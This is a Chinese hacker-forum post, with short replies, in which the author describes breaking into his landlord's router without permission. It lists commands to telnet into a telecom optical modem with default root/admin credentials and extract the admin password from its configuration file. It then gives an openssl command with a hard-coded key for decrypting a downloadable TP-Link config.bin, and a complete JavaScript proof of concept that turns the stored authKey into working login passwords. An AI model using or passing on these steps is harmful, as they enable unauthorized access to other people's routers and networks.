查看: 35824|回复: 19

局域网 无法反弹提权 干掉 房东路由器

[复制链接]
  • TA的每日心情
    慵懒
    2017-4-9 19:10
  • 签到天数: 149 天

    [LV.7]常住居民III

    发表于 2016-3-28 22:49:33 | 显示全部楼层 |阅读模式
    本帖最后由 人=族 于 2016-3-29 09:47 编辑

                             ======================

                             红客联盟&Milw0rm有奖活动

                             ======================

    本人比较腼腆  最近提权 总是很麻烦 因为我是局域网  我又不想 去问房东管理密码 好吧 开始了
    目标是 电信光纤猫  上面有WiFi 密码猜是tp 一样的  脸上去了了

    密码怎么办  查资料
    1.png


    一.查看网关,打开命令提示符
    xp用户:开始-运行-输入cmd-回车      
    win7用户:同上,要是找不到,请点击开始-所有程序-附件-命令提示符
    (实在找不到的话,按住windows功能键+R也可以打开运行对话框)
    打开命令提示符
    键入ipconfig/all回车
    在刚刷过的字符里找到,本地连接,在该项目下查看默认网关default gateway,记录后面数字,一般为192.168.1.1
    开启telnet命令: win7下默认是禁用telnet服务的,重启Telnet方法如下:1、控制面板-程序-打开或关闭windows功能,在里面你可以看到许多服务项,选择“telnet服务器”和“telnet客户端”确定打开即可。

    打开刚才的命令提示符窗口
    键入 telnet 192.168.1.1回车
    192.168.1.1为网关
    这时会清屏并出现一个新窗口,
    出现login继续键入root,然后回车,键入admin,再回车
    此时屏幕出现WAP>shell 回车
    继续键入 cd /mnt/jffs2
    回车,屏幕无明显变化,
    继续键入 grep telecomadmin hw_ctree.xml
    回车出现好几排字幕,找到
    UserName="XXX"。     XXX即为用户名
    PassWord="XXX"。      此处为密码
    2.png
    进来了 [
    看下配置 玩了 不是在这里拨号
    3.png
    4.png
    那就是 tp-wr842n 了
    去看下能爆破不
    5.png
    坑了 这怎么玩吗
    想到刚才 进 光猫的看看 开放了什么端口不
    就这两个
    6.png
    用漏洞扫描器试试
    7.png
    也是没有什么信息 我看着密码口发呆 要是有sql 注入就好了 (那是做梦)
    看看tp 漏洞很多 但是没找到 tp-wr842n  想我一代红客
    竟然被局域网难倒了 奇耻大辱
    终于一个解决方法  

    1.漏洞1,任意下载config.bin[路由器配置文件] 例如:**.**.**.**/config.bin

    2.openssl enc -d -des-ecb -nopad -K 478DA50BF9E3D2CF -in config.bin

    8.png
    提取配置信息。

    3.找到首行

    authKey 7WyV06YRw39nwlv
    此为加密过的用户后台登陆密码。

    4.漏洞2,Query.js存在算法BUG.经过研究这段加密字串“7WyV06YRw39nwlv”通过用户浏览器运算生成,且存在算法漏洞。

    5.加密字串虽不可逆,但存在大量碰撞,即任意字符可生成相同的加密字串。破解文件html网页格式【自行转存】。找个数据库软件,用最后生成的SQL脚本【笛卡尔积】生成的每一组字符串均可登录后台。【网页格式,代码部分另存成网页html文件】

    9.png
    poc

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://**.**.**.**/TR/xhtml1/DTD/xhtml1-transitional.dtd">

    <html xmlns="http://**.**.**.**/1999/xhtml">

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

    <title>TPLINK_Auth_Key_计算器 作者:青岛小哥 email:qdpp007@**.**.**.**</title>

    <script type="text/javascript">

    function $(id)

    {

            return document.getElementById(id);

    }

    function orgAuthPwd (pwd)

            {       

                    var strDe = "RDpbLfCPsJZ7fiv"; /*字符宽度15*/

                    var dic = "yLwVl0zKqws7LgKPRQ84Mdt708T1qQ3Ha7xv3H7NyU84p21BriUWBU43odz3iP4rBL3cD02KZciX"+

                                      "TysVXiV8ngg6vL48rPJyAUw0HurW20xqxv9aYb4M9wK1Ae0wlro510qXeU07kV57fQMc8L6aLgML"+

                                      "wygtc0F10a0Dg70TOoouyFhdysuRMO51yY5ZlOZZLEal1h0t9YQW0Ko7oBwmCAHoic4HYbUyVeU3"+

                                      "sfQ1xtXcPcf1aT303wAQhv66qzW"; /*字符宽度255*/

                    $('dspDic').value=dic;

                    $('dspPwd').value=pwd;

                    $('dspStrDe').value=strDe;

                    return securityEncode(pwd, strDe, dic);

            }

    function securityEncode (input1, input2, input3)

            {

                    var dictionary = input3; /*=255*/

                    var output = "";

                    var len, len1, len2, lenDict;

                    var cl = 0xBB, cr = 0xBB;



                    len1 = input1.length; /*len1=6~15*/

                    len2 = input2.length; /*len2=15*/

                    lenDict = dictionary.length; /*lenDict=255*/

                    len = len1 > len2 ? len1 : len2; /*密码限定宽度最大15位,len恒等于15*/



                    for (var index = 0; index < len; index++) /*index= 0 to 14*/

                    {

                            cl = 0xBB;

                            cr = 0xBB;



                            if (index >= len1) /*如果密码位数=14执行1次,=15不执行,=13执行2次,=12 3,11 4,10 5,9 6...保证取所有密码字符unicode*/

                            {

                                    cr = input2.charCodeAt(index);

                            }

                            else if (index >= len2) /*14>=15,永远不执行!*/

                            {

                                    cl = input1.charCodeAt(index);

                            }

                            else

                            {

                                    cl = input1.charCodeAt(index); /*取所有密码字符unicode,超出部分取0xBB,补足15位*/

                                    cr = input2.charCodeAt(index); /*cr恒等于:82,68,112,98,76,102,67,80,115,74,90,55,102,105,118*/

                            }

                            output += dictionary.charAt((cl ^ cr)%lenDict); /*cl取所有密码字符unicode与cr异或mod 255*/

                    }



                    return output;

            }

    function lgDoSub()

                    {

                            var lgPwd = $('pwd').value;

                            var result;

                            var strAsc='';

                            result = orgAuthPwd(lgPwd);

                            for (var ix = 32 ;ix < 127;ix++) /*32~126可见字符*/

                            {

                                    strAsc += String.fromCharCode(ix);

                            }

                            $('dspAsc').value=strAsc;

                            $('dspAuthKey').value=result;

                            $('dspLen').value=result.length;

                    }

    function AuthKeyCup()

            {

                            var arrayPasswd = new Array(15);

                            var passwdLen=0;

                            var authkey = $('authKey').value;

                            var strDe = "RDpbLfCPsJZ7fiv";

                            var dic = "yLwVl0zKqws7LgKPRQ84Mdt708T1qQ3Ha7xv3H7NyU84p21BriUWBU43odz3iP4rBL3cD02KZciX"+

                                          "TysVXiV8ngg6vL48rPJyAUw0HurW20xqxv9aYb4M9wK1Ae0wlro510qXeU07kV57fQMc8L6aLgML"+

                                          "wygtc0F10a0Dg70TOoouyFhdysuRMO51yY5ZlOZZLEal1h0t9YQW0Ko7oBwmCAHoic4HYbUyVeU3"+

                                          "sfQ1xtXcPcf1aT303wAQhv66qzW"; /*字符宽度255*/

                            var passwd='';

                            for(var crIndex=0,passwdList,strComp_authkey,codeCr;crIndex<15;crIndex++)

                            {

                                    passwdList='';

                                    strComp_authkey=authkey.charAt(crIndex);

                                    codeCr=strDe.charCodeAt(crIndex); /*cr恒等于:82,68,112,98,76,102,67,80,115,74,90,55,102,105,118*/

                                    for(var index=32,strtmp,codeCl,strDic;index<127;index++)

                                    {

                                            strtmp = String.fromCharCode(index);

                                            codeCl = strtmp.charCodeAt(0);

                                            strDic = dic.charAt((codeCl ^ codeCr)%255);

                                            if (strComp_authkey==strDic)

                                            {

                                                    passwdList += strtmp;

                                                    continue;                                       

                                            }

                                    }

                                    arrayPasswd[crIndex]=passwdList;

                            }

                            for(var i=0;i<15;i++)

                            {

                                    if(arrayPasswd.length==0)

                                    {

                                            passwdLen=i;

                                            break; /*密码长度=i,密码长度=0退出外循环*/

                                    }

                                    else if (i==14)

                                    {

                                            passwdLen=15;

                                    }

                            }

                            for(var i=0;i<passwdLen;i++)

                            {

                                    passwd+=arrayPasswd+'\r\n';                               

                            }

                            $('dspPasswd').value=passwd;

                            passwd='';

                            for(var i=0;i<passwdLen;i++)

                            {

                                    passwd+="drop table t"+i+";\r\n";

                                    passwd+="CREATE TABLE t"+i+"(pwd nvarchar(50) NULL);\r\n";

                                    for(var j=0;j<arrayPasswd.length;j++)

                                    {                                       

                                            passwd+="insert into t" + i + " values('" + arrayPasswd.substr(j,1)+"');\r\n";

                                    }

                            }

                            passwd+="select t0.pwd,t1.pwd,t2.pwd,t3.pwd,t4.pwd,t5.pwd,t6.pwd,t7.pwd from t0,t1,t2,t3,t4,t5,t6,t7";

                            $('dspSql').value=passwd;

    //                        var arrayXH = new Array(passwdLen);

    //                        for(var j=0;j<passwdLen;j++)

    //                        {

    //                                arrayXH[j]=arrayPasswd[j].length;                               

    //                        }

    //                        for(var j=0;j<passwdLen;j++)

    //                        {

    //                                for(var k=0;k<arrayXH[j];k++)

    //                                {

    //                                        k*10+

    //                                }

    //                        }

                    }

    </script>



    </head>

    <body>

    <span style="text-align:center">TPLINK_Auth_Key_计算器(新用户界面登录密码演算)  </span><br />

    <span style="text-align:center">免责声明:本计算器程序(方法)可能带有攻击性,仅供安全研究与教学之用,<br />用户将其信息做其他用途,由用户承担全部法律及连带责任,本人不承担任何法律及连带责任。  

    </span>

    <form action="" method="get"><fieldset><legend>源码测试</legend>



    密码[最小6位]:

        <input name="pwd" type="text" id="pwd" size="15" maxlength="15" />

    <input type="button" name="btnOK" id="btnOK" value="计算KEY" onclick="lgDoSub()" />

    <br />

    <br />

    显示 pwd:

    <input name="dspPwd" type="text" id="dspPwd" />

    <br />

    <br />

    显示 strDe:

    <input name="dspStrDe" type="text" id="dspStrDe" />

    <br />

    <br />

    显示 Dic:

    <textarea name="dspDic" cols="70" rows="4" id="dspDic"></textarea>

    <br />

    <br />

    显示 ASC码表:

    <textarea name="dspAsc" cols="70" rows="2" id="dspAsc"></textarea>

    <br />

    <br />

    结果 Auth_key:

    <input name="dspAuthKey" type="text" id="dspAuthKey" />

    字符宽度:

    <input name="dspLen" type="text" id="dspLen" size="5" />

    </fieldset>

    </form>

    <br /><br />



    <form action="" method="get">

    <fieldset>

    <legend>你懂得</legend>

      Auth_key【演示字符19830917】:

      <input name="authKey" type="text" id="authKey" value="0rZily4W9TefbwK" size="15" maxlength="15" />

      <input type="button" name="btnCup" id="btnCup" value="解密KEY" onclick="AuthKeyCup()" />

      15位:0rZily4W9TefbwK<br />

      <br />

    原始密码字符【从首行由上到下,每行任选1个字符对应密码一位,组成密码串,N行字符==N位密码】:<br />

    <textarea name="dspPasswd" cols="70" rows="10" id="dspPasswd"></textarea>

    <br />

    <br />

    数据库查询SQL:

    <textarea name="dspSql" cols="70" rows="10" id="dspSql"></textarea>

    </fieldset>

    </form>

    </body>

    </html>



    我的加密 上面也说了 就是 7WyV06YRw39nwlv

    解密的
    EYst
    #w
    /=Xp
    -0a
    %/6IT
    1
    3
    @
    qz
    Tnq}
    .4
    c
    do
    m
    .U

    我自己组合 没用数据库软件

    成功登陆
    10.png

    评分

    参与人数 1i币 +8 收起 理由
    90_ + 8 感谢分享

    查看全部评分

    回复

    使用道具 举报

  • TA的每日心情
    慵懒
    2017-4-9 19:10
  • 签到天数: 149 天

    [LV.7]常住居民III

     楼主| 发表于 2016-3-28 22:53:53 | 显示全部楼层
    发到 无线安全 那边去了  http://www.08sec.com/thread-8150-1-1.html
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2019-9-24 17:13
  • 签到天数: 187 天

    [LV.7]常住居民III

    发表于 2016-3-28 23:45:25 | 显示全部楼层
    我在想提权跟你是局域网有很大的关系么

    点评

    nc 不开端口 怎么反弹吗  详情 回复 发表于 2016-3-29 09:46
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-3-29 00:07:00 | 显示全部楼层
    我是来水经验的……
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2017-6-1 14:33
  • 签到天数: 97 天

    [LV.6]常住居民II

    发表于 2016-3-29 00:25:50 | 显示全部楼层
    不错不错,局域网的思路很清晰
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2017-4-9 19:10
  • 签到天数: 149 天

    [LV.7]常住居民III

     楼主| 发表于 2016-3-29 09:46:55 | 显示全部楼层
    No0d1es 发表于 2016-3-28 23:45
    我在想提权跟你是局域网有很大的关系么

    nc 不开端口 怎么反弹吗
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2017-9-11 15:40
  • 签到天数: 425 天

    [LV.9]以坛为家II

    发表于 2016-3-29 10:17:52 | 显示全部楼层
    good
    回复

    使用道具 举报

  • TA的每日心情
    奋斗
    2018-11-6 18:37
  • 签到天数: 358 天

    [LV.8]以坛为家I

    发表于 2016-3-29 13:59:30 | 显示全部楼层
    不错不错,这个好!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2019-9-24 17:13
  • 签到天数: 187 天

    [LV.7]常住居民III

    发表于 2016-3-29 14:48:42 | 显示全部楼层
    人=族 发表于 2016-3-29 09:46
    nc 不开端口 怎么反弹吗

    提Linux?
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2016-3-25 20:03
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2016-3-30 10:56:49 | 显示全部楼层
    66666666
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-21 23:10 , Processed in 0.029169 second(s), 16 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部